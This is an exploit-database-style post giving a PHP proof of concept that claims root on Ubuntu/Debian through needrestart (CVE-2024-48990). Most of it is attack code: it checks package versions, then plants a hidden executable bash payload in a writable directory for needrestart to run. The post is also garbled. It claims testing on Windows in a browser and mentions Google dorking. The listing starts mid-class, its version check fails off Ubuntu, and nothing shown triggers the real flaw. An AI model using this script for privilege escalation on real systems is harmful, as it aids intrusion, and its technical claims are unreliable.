=============================================================================================================================================
| # Title : Needrestart 3.5-5ubuntu2.2 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 135.0.1 (64 bits) |
| # Vendor : https://launchpad.net/ubuntu/+source/needrestart/3.5-5ubuntu2.2 |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: This code aims to exploit a vulnerability in the needrestart tool found in Ubuntu and Debian systems, which could allow a local attacker to gain root privileges if the system is not updated. Note that the listing's own $fixedVersions table treats 3.5-5ubuntu2.2 as the fixed package for Ubuntu 22.04, so the affected packages are the ones older than the versions listed there. The table covers Ubuntu only; on Debian or Fedora the final version comparison has no fixed version to compare against, so its result is not meaningful.

( Related : https://packetstorm.news/files/id/183464/ Related CVE Numbers: CVE-2024-48990 )

[+] Save the code as poc.php.

[+] Set Target : line 92

[+] Usage : php poc.php

[+] PayLoad : (the listing is truncated at its start: the class declaration and the beginning of the constructor are missing)

writableDir = $writableDir; $this->listenerTimeout = $listenerTimeout; } public function checkVulnerability() { $distro = $this->getDistro(); if (!in_array($distro, ['ubuntu', 'debian', 'fedora'])) { return "النظام ليس Ubuntu/Debian/Fedora، لا يمكن التحقق من الثغرة."; } if ($distro == 'ubuntu') { $version = $this->getUbuntuVersion(); if (!$version) return "تعذر تحديد إصدار أوبونتو."; $fixedVersions = [ '22.04' => '3.5-5ubuntu2.2', '20.04' => '3.4-6ubuntu0.1.esm1', '18.04' => '3.1-1ubuntu0.1.esm1' ]; if (!isset($fixedVersions[$version])) { return "إصدار أوبونتو $version غير معروف أو غير مختبر."; } } $needrestartVersion = $this->getNeedrestartVersion(); if (!$needrestartVersion) { return "لم يتم العثور على حزمة needrestart مثبتة."; } return version_compare($needrestartVersion, $fixedVersions[$version], '<') ? "النظام معرض للخطر، إصدار needrestart هو $needrestartVersion." 
: "إصدار needrestart آمن ($needrestartVersion)."; } private function getDistro() { return strtolower(trim(shell_exec("lsb_release -is"))); } private function getUbuntuVersion() { return trim(shell_exec("lsb_release -rs")); } private function getNeedrestartVersion() { $output = shell_exec("dpkg -l needrestart | grep '^ii'"); if (!$output) return null; $parts = preg_split('/\s+/', $output); return $parts[2] ?? null; } public function exploit() { if ($this->isRoot()) { return "الجلسة تمتلك صلاحيات الجذر بالفعل."; } if (!is_writable($this->writableDir)) { return "الدليل {$this->writableDir} غير قابل للكتابة."; } $payloadPath = $this->writableDir . '/.' . bin2hex(random_bytes(5)); file_put_contents($payloadPath, $this->generatePayload()); chmod($payloadPath, 0755); return "تم تحميل الحمولة التنفيذية إلى: $payloadPath. انتظر تشغيل needrestart..."; } private function isRoot() { return trim(shell_exec("id -u")) === '0'; } private function generatePayload() { return "#!/bin/bash\n" . "echo 'استغلال ناجح! المستخدم الحالي: ' \$(whoami) > /tmp/pwned.txt\n"; } } $exploit = new UbuntuNeedRestartExploit(); echo $exploit->checkVulnerability() . "\n"; echo $exploit->exploit() . "\n"; Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================